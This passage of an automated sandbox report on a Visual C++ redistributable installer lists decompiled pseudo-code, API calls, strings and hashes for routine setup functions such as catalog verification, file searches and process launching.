                                                                          APIs
                                                                            • Part of subcall function 0001CC57: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,0001E336,000000FF,00000000,00000000,0001E336,?,?,0001DADD,?,?,?,?), ref: 0001CC82
                                                                          • CreateFileW.KERNEL32(E90005BA,80000000,00000005,00000000,00000003,08000000,00000000,000152BD,0005B450,00000000,000153B5,04680A79,?,000152B5,00000000,00015381), ref: 0001C84F
                                                                          • GetLastError.KERNEL32(?,?,?,000275F7,00015565,00015371,00015371,00000000,?,00015381,FFF9E89D,00015381,000153B5,0001533D,?,0001533D), ref: 0001C894
                                                                          Strings
                                                                          • Failed to get catalog local file path, xrefs: 0001C8D2
                                                                          • catalog.cpp, xrefs: 0001C8B5
                                                                          • Failed to verify catalog signature: %ls, xrefs: 0001C88D
                                                                          • Failed to find payload for catalog file., xrefs: 0001C8D9
                                                                          • Failed to open catalog in working path: %ls, xrefs: 0001C8C2
                                                                          • @Met, xrefs: 0001C894
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareCreateErrorFileLastString
                                                                          • String ID: @Met$Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
                                                                          • API String ID: 1774366664-3330773434
                                                                          • Opcode ID: 44d9c2a6720d97e6748686d6c056392a719149f7f311fbab9ed8f5809fdaf133
                                                                          • Instruction ID: 27c4e38a68fe6a88bb9226d7e86dcc93dcdfec1fa932765cb89e02ebfcab5cbb
                                                                          • Opcode Fuzzy Hash: 44d9c2a6720d97e6748686d6c056392a719149f7f311fbab9ed8f5809fdaf133
                                                                          • Instruction Fuzzy Hash: 7031A471A40A15BBE7119B64CC42FEEB7A4EB04710F118129FD09EB290DB71ED9097D4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 76%
                                                                          			E0005082D(WCHAR* _a4, void _a8, short _a12, void** _a16) {
                                                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                                                          				struct _PROCESS_INFORMATION _v24;
                                                                          				struct _STARTUPINFOW _v92;
                                                                          				void* __edi;
                                                                          				void* _t47;
                                                                          				void* _t50;
                                                                          
                                                                          				_v8 = 0;
                                                                          				E0003F670(_t47,  &_v92, 0, 0x44);
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t30 =  !=  ? _a8 : 0x5b524;
                                                                          				_push( !=  ? _a8 : 0x5b524);
                                                                          				_t50 = E00011F20( &_v8, L"\"%ls\" %ls", _a4);
                                                                          				if(_t50 >= 0) {
                                                                          					_v92.cb = 0x44;
                                                                          					_v92.wShowWindow = _a12;
                                                                          					if(CreateProcessW(_a4, _v8, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24) != 0) {
                                                                          						_v24.hProcess = 0;
                                                                          						 *_a16 = _v24.hProcess;
                                                                          					} else {
                                                                          						_t53 =  <=  ? GetLastError() : _t41 & 0x0000ffff | 0x80070000;
                                                                          						_t50 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t41 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "procutil.cpp", 0x9e, _t50);
                                                                          					}
                                                                          				}
                                                                          				if(_v24.hThread != 0) {
                                                                          					CloseHandle(_v24.hThread);
                                                                          					_v24.hThread = 0;
                                                                          				}
                                                                          				if(_v24.hProcess != 0) {
                                                                          					CloseHandle(_v24.hProcess);
                                                                          					_v24 = 0;
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t50;
                                                                          			}










                                                                          APIs
                                                                          • CreateProcessW.KERNEL32 ref: 0005089A
                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 000508A4
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 000508ED
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 000508FA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$CreateErrorLastProcess
                                                                          • String ID: "%ls" %ls$@Met$D$procutil.cpp
                                                                          • API String ID: 161867955-4294435303
                                                                          • Opcode ID: c5406668a9519cad3dc8900d4416389543b54c44ea22076fffa3cadcee14e4f7
                                                                          • Instruction ID: d4a139b99a998bf0a4d2d4319fe057a989d235449b7a9b7e5a66bdcceab4ca7d
                                                                          • Opcode Fuzzy Hash: c5406668a9519cad3dc8900d4416389543b54c44ea22076fffa3cadcee14e4f7
                                                                          • Instruction Fuzzy Hash: 90213C72D0021AAFEB11EFE4CD419EFBBB9EF04316F10402AEE05B6161D7749E449BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 56%
                                                                          			E00019A6D(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				signed char _t18;
                                                                          				void* _t34;
                                                                          
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t30 = _a4;
                                                                          				if(E000171CF(_a8,  *((intOrPtr*)(_a4 + 0x14)),  &_v8, 0) >= 0) {
                                                                          					_t18 = GetFileAttributesW(_v8);
                                                                          					if(_t18 != 0xffffffff) {
                                                                          						if((_t18 & 0x00000010) == 0) {
                                                                          							_t34 = 0x80070003;
                                                                          							L9:
                                                                          							if(_t34 == 0x80070002 || _t34 == 0x80070003) {
                                                                          								_push(_t34);
                                                                          								_push(_v8);
                                                                          								E0005061A(2, "Directory search: %ls, did not find path: %ls, reason: 0x%x",  *_t30);
                                                                          								_t34 = 0;
                                                                          							} else {
                                                                          								if(_t34 < 0) {
                                                                          									_push(_v8);
                                                                          									E0005012F(_t34, "Failed while searching directory search: %ls, for path: %ls",  *_t30);
                                                                          								}
                                                                          							}
                                                                          							goto L14;
                                                                          						}
                                                                          						_t34 = E000180F6(_a8,  *((intOrPtr*)(_t30 + 4)), _v8, 0);
                                                                          						if(_t34 >= 0) {
                                                                          							goto L9;
                                                                          						}
                                                                          						_push("Failed to set directory search path variable.");
                                                                          						goto L2;
                                                                          					}
                                                                          					_t34 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
                                                                          					goto L9;
                                                                          				} else {
                                                                          					_push("Failed to format variable string.");
                                                                          					L2:
                                                                          					_push(_t34);
                                                                          					E0005012F();
                                                                          					L14:
                                                                          					E00012793(_v8);
                                                                          					return _t34;
                                                                          				}
                                                                          			}







                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 00019A86
                                                                          • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,0001A7A9,00000100,000002C0,000002C0,00000100), ref: 00019AA6
                                                                          • GetLastError.KERNEL32(?,0001A7A9,00000100,000002C0,000002C0,00000100), ref: 00019AB1
                                                                          Strings
                                                                          • Failed to format variable string., xrefs: 00019A91
                                                                          • Failed while searching directory search: %ls, for path: %ls, xrefs: 00019B06
                                                                          • Failed to set directory search path variable., xrefs: 00019AE1
                                                                          • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 00019B1C
                                                                          • @Met, xrefs: 00019AB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileLastOpen@16
                                                                          • String ID: @Met$Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
                                                                          • API String ID: 1811509786-1706642813
                                                                          • Opcode ID: cde7c74e141bf25449de9fee0c7a91b828299a9b1bbdbc82bef1d50f4dc2d4c7
                                                                          • Instruction ID: 128cf1eb381ee080aef757373c34f5fcaa055edea8788973219ac6293062a169
                                                                          • Opcode Fuzzy Hash: cde7c74e141bf25449de9fee0c7a91b828299a9b1bbdbc82bef1d50f4dc2d4c7
                                                                          • Instruction Fuzzy Hash: 69113D33944225F7CB226698DD12FDFBB65EF14361F200121FD00761A1D7365E94A7D6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 60%
                                                                          			E00019C39(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				signed char _t18;
                                                                          				void* _t34;
                                                                          
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t30 = _a4;
                                                                          				if(E000171CF(_a8,  *((intOrPtr*)(_a4 + 0x14)),  &_v8, 0) >= 0) {
                                                                          					_t18 = GetFileAttributesW(_v8);
                                                                          					if(_t18 != 0xffffffff) {
                                                                          						if((_t18 & 0x00000010) != 0) {
                                                                          							L12:
                                                                          							_push(_v8);
                                                                          							E0005061A(2, "File search: %ls, did not find path: %ls",  *_t30);
                                                                          							_t34 = 0;
                                                                          							L13:
                                                                          							E00012793(_v8);
                                                                          							return _t34;
                                                                          						}
                                                                          						_t34 = E000180F6(_a8,  *((intOrPtr*)(_t30 + 4)), _v8, 0);
                                                                          						if(_t34 >= 0) {
                                                                          							L5:
                                                                          							if(_t34 == 0x80070002 || _t34 == 0x80070003) {
                                                                          								goto L12;
                                                                          							} else {
                                                                          								if(_t34 < 0) {
                                                                          									_push(_v8);
                                                                          									E0005012F(_t34, "Failed while searching file search: %ls, for path: %ls",  *_t30);
                                                                          								}
                                                                          								goto L13;
                                                                          							}
                                                                          						}
                                                                          						_push("Failed to set variable to file search path.");
                                                                          						L2:
                                                                          						_push(_t34);
                                                                          						E0005012F();
                                                                          						goto L13;
                                                                          					}
                                                                          					_t34 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
                                                                          					goto L5;
                                                                          				}
                                                                          				_push("Failed to format variable string.");
                                                                          				goto L2;
                                                                          			}







                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 00019C52
                                                                          • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,0001A781,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 00019C72
                                                                          • GetLastError.KERNEL32(?,0001A781,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00019C7D
                                                                          Strings
                                                                          • Failed to format variable string., xrefs: 00019C5D
                                                                          • Failed while searching file search: %ls, for path: %ls, xrefs: 00019CAA
                                                                          • File search: %ls, did not find path: %ls, xrefs: 00019CE0
                                                                          • Failed to set variable to file search path., xrefs: 00019CD4
                                                                          • @Met, xrefs: 00019C7D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileLastOpen@16
                                                                          • String ID: @Met$Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
                                                                          • API String ID: 1811509786-4147764969
                                                                          • Opcode ID: 397f04f396ce64659c9fb153b14f9de99abfad504e01874e910c1aa1714f619d
                                                                          • Instruction ID: 226d6f6d9e67014c1d4664774f7ab254db849390183af57795f78963b5bb13f4
                                                                          • Opcode Fuzzy Hash: 397f04f396ce64659c9fb153b14f9de99abfad504e01874e910c1aa1714f619d
                                                                          • Instruction Fuzzy Hash: EF113A32940225B7CF222A94CE52BDEBBA9EF00321F204111FD80B6161D7329E90A7D5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 51%
                                                                          			E00015BF0(void* __ecx, void* _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				void* __edi;
                                                                          				void* _t24;
                                                                          				void* _t28;
                                                                          
                                                                          				_t19 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t24 =  !=  ? L"ProgramFilesDir" : L"CommonFilesDir";
                                                                          				if(E00050E3F(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion", 0x20119,  &_v8) >= 0) {
                                                                          					_t28 = E00050F6E(_v8, _t24, _a8);
                                                                          					if(_t28 >= 0) {
                                                                          						_t28 = E00012B2E(_t19, _t24, _a8);
                                                                          						if(_t28 < 0) {
                                                                          							_push("Failed to ensure path was backslash terminated.");
                                                                          							goto L6;
                                                                          						}
                                                                          					} else {
                                                                          						E0005012F(_t28, "Failed to read folder path for \'%ls\'.", _t24);
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to open Windows folder key.");
                                                                          					L6:
                                                                          					_push(_t28);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					RegCloseKey(_v8);
                                                                          				}
                                                                          				return _t28;
                                                                          			}








                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00015C77
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                          • API String ID: 47109696-3209209246
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 36%
                                                                          			E0002CCF4(void* __ecx, void* _a4) {
                                                                          				long _v8;
                                                                          				long _t20;
                                                                          
                                                                          				_t20 = 0;
                                                                          				_v8 = 0;
                                                                          				if(WaitForSingleObject(_a4, 0x493e0) == 0) {
                                                                          					if(GetExitCodeThread(_a4,  &_v8) == 0) {
                                                                          						_t24 =  <=  ? GetLastError() : _t9 & 0x0000ffff | 0x80070000;
                                                                          						_t20 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t9 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "elevation.cpp", 0x4b1, _t20);
                                                                          						_push("Failed to get cache thread exit code.");
                                                                          						goto L4;
                                                                          					}
                                                                          				} else {
                                                                          					_t27 =  <=  ? GetLastError() : _t13 & 0x0000ffff | 0x80070000;
                                                                          					_t20 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t13 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "elevation.cpp", 0x4ac, _t20);
                                                                          					_push("Failed to wait for cache thread to terminate.");
                                                                          					L4:
                                                                          					_push(_t20);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return _t20;
                                                                          			}






                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,0002D134,00000000,?,?,0002C59C,00000001,?,?,?,?,?), ref: 0002CD06
                                                                          • GetLastError.KERNEL32(?,?,0002D134,00000000,?,?,0002C59C,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0002CD10
                                                                          • GetExitCodeThread.KERNEL32(00000001,?,?,?,0002D134,00000000,?,?,0002C59C,00000001,?,?,?,?,?,00000000), ref: 0002CD4C
                                                                          • GetLastError.KERNEL32(?,?,0002D134,00000000,?,?,0002C59C,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0002CD56
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                          • String ID: @Met$Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
                                                                          • API String ID: 3686190907-2950994014
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E000267B0(void* __ecx, void* _a4) {
                                                                          				long _v8;
                                                                          
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				if(WaitForSingleObject(_a4, 0xffffffff) == 0) {
                                                                          					if(GetExitCodeThread(_a4,  &_v8) == 0) {
                                                                          						_t24 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          						_t25 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "core.cpp", 0x630, _t25);
                                                                          						_push("Failed to get cache thread exit code.");
                                                                          						goto L4;
                                                                          					}
                                                                          				} else {
                                                                          					_t30 =  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
                                                                          					_t31 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
                                                                          					_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t18 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "core.cpp", 0x62b, _t31);
                                                                          					_push("Failed to wait for cache thread to terminate.");
                                                                          					L4:
                                                                          					_push(_v8);
                                                                          					E0005012F();
                                                                          				}
                                                                          				return _v8;
                                                                          			}





                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,00026CFB,00014740,?,00000000,?,00000000,00000001), ref: 000267BD
                                                                          • GetLastError.KERNEL32(?,00026CFB,00014740,?,00000000,?,00000000,00000001), ref: 000267C7
                                                                          • GetExitCodeThread.KERNEL32(00000001,00000000,?,00026CFB,00014740,?,00000000,?,00000000,00000001), ref: 00026806
                                                                          • GetLastError.KERNEL32(?,00026CFB,00014740,?,00000000,?,00000000,00000001), ref: 00026810
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                          • String ID: @Met$Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
                                                                          • API String ID: 3686190907-3423812259
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 92%
                                                                          			E0005837F(void* __ecx, void* __eflags, signed int _a4, intOrPtr* _a8) {
                                                                          				short* _v8;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				signed int _t45;
                                                                          				signed int _t51;
                                                                          				short* _t52;
                                                                          				signed int _t55;
                                                                          				signed int _t64;
                                                                          				short* _t67;
                                                                          				short** _t75;
                                                                          				short* _t81;
                                                                          				intOrPtr* _t84;
                                                                          
                                                                          				_t81 = 0;
                                                                          				_t84 = E000138D4(0x10, 1);
                                                                          				_t75 =  *(_a4 + 0x44);
                                                                          				while(_t75 != 0) {
                                                                          					if(CompareStringW(0x7f, 0,  *_t75, 0xffffffff, L"http://appsyndication.org/2006/appsyn", 0xffffffff) != 2 || CompareStringW(0x7f, 0, _t75[1], 0xffffffff, L"application", 0xffffffff) != 2) {
                                                                          						L9:
                                                                          						_t75 = _t75[4];
                                                                          						continue;
                                                                          					} else {
                                                                          						_t81 = E000121A5(_t84, _t75[2], 0);
                                                                          						if(_t81 < 0) {
                                                                          							L29:
                                                                          							if(_t84 != 0) {
                                                                          								E00058530(_t75, _t81, _t84);
                                                                          							}
                                                                          							return _t81;
                                                                          						}
                                                                          						_t67 = _t75[3];
                                                                          						while(1) {
                                                                          							_v8 = _t67;
                                                                          							if(_t67 == 0) {
                                                                          								goto L9;
                                                                          							}
                                                                          							_t6 =  &(_t67[2]); // 0x700079
                                                                          							if(CompareStringW(0x7f, 0,  *_t6, 0xffffffff, L"type", 0xffffffff) != 2) {
                                                                          								L7:
                                                                          								_t67 = _v8[6];
                                                                          								continue;
                                                                          							}
                                                                          							_t9 = _t84 + 4; // 0x4
                                                                          							_t81 = E000121A5(_t9, _v8[4], 0);
                                                                          							if(_t81 < 0) {
                                                                          								goto L29;
                                                                          							}
                                                                          							goto L7;
                                                                          						}
                                                                          						goto L9;
                                                                          					}
                                                                          				}
                                                                          				_t75 = _a4;
                                                                          				_t44 = _t75[0xc];
                                                                          				if(_t75[0xc] == 0) {
                                                                          					L22:
                                                                          					_t45 =  *(_t84 + 8);
                                                                          					if(_t45 == _t75[0xc]) {
                                                                          						L28:
                                                                          						 *_a8 = _t84;
                                                                          						_t84 = 0;
                                                                          						goto L29;
                                                                          					}
                                                                          					if(_t45 == 0) {
                                                                          						if( *(_t84 + 0xc) != 0) {
                                                                          							E00013999( *(_t84 + 0xc));
                                                                          							 *(_t84 + 0xc) =  *(_t84 + 0xc) & 0x00000000;
                                                                          						}
                                                                          						goto L28;
                                                                          					}
                                                                          					_t51 = E00013A72( *(_t84 + 0xc), _t45 << 6, 0);
                                                                          					 *(_t84 + 0xc) = _t51;
                                                                          					if(_t51 != 0) {
                                                                          						goto L28;
                                                                          					}
                                                                          					_t52 = 0x8007000e;
                                                                          					_push(0x8007000e);
                                                                          					_push(0x6c);
                                                                          					L14:
                                                                          					_push("apuputil.cpp");
                                                                          					_t81 = _t52;
                                                                          					E000137D3(_t52);
                                                                          					goto L29;
                                                                          				}
                                                                          				_t55 = E000138D4(_t44 << 6, 1);
                                                                          				 *(_t84 + 0xc) = _t55;
                                                                          				if(_t55 != 0) {
                                                                          					_a4 = _a4 & 0x00000000;
                                                                          					if(_t75[0xc] <= 0) {
                                                                          						L21:
                                                                          						E0005A280( *(_t84 + 0xc),  *(_t84 + 8), 0x40, E00057D0A, 0);
                                                                          						goto L22;
                                                                          					}
                                                                          					_t78 = 0;
                                                                          					_v8 = 0;
                                                                          					while(1) {
                                                                          						_t81 = E00057FEC(_t75[0xd] + _t78,  *_t84, ( *(_t84 + 8) << 6) +  *(_t84 + 0xc));
                                                                          						if(_t81 < 0) {
                                                                          							goto L29;
                                                                          						}
                                                                          						if(_t81 != 1) {
                                                                          							 *(_t84 + 8) =  *(_t84 + 8) + 1;
                                                                          						}
                                                                          						_t64 = _a4 + 1;
                                                                          						_t78 =  &(_v8[0x20]);
                                                                          						_a4 = _t64;
                                                                          						_v8 =  &(_v8[0x20]);
                                                                          						if(_t64 < _t75[0xc]) {
                                                                          							continue;
                                                                          						} else {
                                                                          							goto L21;
                                                                          						}
                                                                          					}
                                                                          					goto L29;
                                                                          				}
                                                                          				_t52 = 0x8007000e;
                                                                          				_push(0x8007000e);
                                                                          				_push(0x54);
                                                                          				goto L14;
                                                                          			}
















                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000000,?,?,00038E1F,000002C0,00000100), ref: 000583AD
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,00038E1F,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 000583C8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareHeapString$AllocateProcess
                                                                          • String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                                          • API String ID: 2664528157-4206478990
                                                                          • Opcode ID: 30ad11add63eb4d1bc5ffc8980d4ed17e9e71841edc4c95e1c92a40926ba4a14
                                                                          • Instruction ID: 2698e9562e25fa53718da2bec120a321559960de60e3402b403a752288befcd5
                                                                          • Opcode Fuzzy Hash: 30ad11add63eb4d1bc5ffc8980d4ed17e9e71841edc4c95e1c92a40926ba4a14
                                                                          • Instruction Fuzzy Hash: F751AF31604702ABEB618F54CC85F6B77A5AB04762F20C214FD69AB2D2DF75E944CB10
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 70%
                                                                          			E00020419(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                          				void* _v8;
                                                                          				void* _v12;
                                                                          				char _v16;
                                                                          				void* _t65;
                                                                          				void* _t68;
                                                                          				void* _t72;
                                                                          				void* _t74;
                                                                          				intOrPtr* _t75;
                                                                          				void* _t77;
                                                                          				void* _t78;
                                                                          
                                                                          				_t72 = __edx;
                                                                          				_t68 = __ecx;
                                                                          				_t75 = _a4;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
